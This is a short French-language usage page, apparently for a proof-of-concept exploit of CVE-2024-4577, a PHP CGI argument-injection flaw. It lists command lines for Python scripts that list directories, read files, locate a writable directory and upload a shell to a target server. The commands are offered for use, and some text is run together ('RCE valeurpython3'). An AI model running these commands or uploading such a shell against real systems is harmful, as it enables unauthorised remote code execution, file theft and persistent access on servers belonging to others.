
Preuve de concept d'exploitation pour CVE-2024-4577, une vulnérabilité d'injection d'arguments CGI PHP, permettant l'exécution de code à distance et l'accès à un shell sur les cibles vulnérables.
RCE valeurpython3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory
trouver un répertoire inscriptible
python3 cek.py --target https://target/index.php --find
charger le shell
python3 cuk.py --target https://target/index.php